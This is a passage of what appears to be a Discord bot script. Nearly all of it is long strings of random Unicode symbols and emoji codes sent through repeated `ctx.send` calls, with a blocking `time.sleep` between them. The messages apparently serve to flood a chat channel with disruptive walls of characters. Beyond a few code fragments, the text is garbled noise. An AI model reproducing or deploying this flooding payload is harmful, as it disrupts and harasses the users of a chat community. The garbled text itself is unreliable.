ᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") time.sleep(3) await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥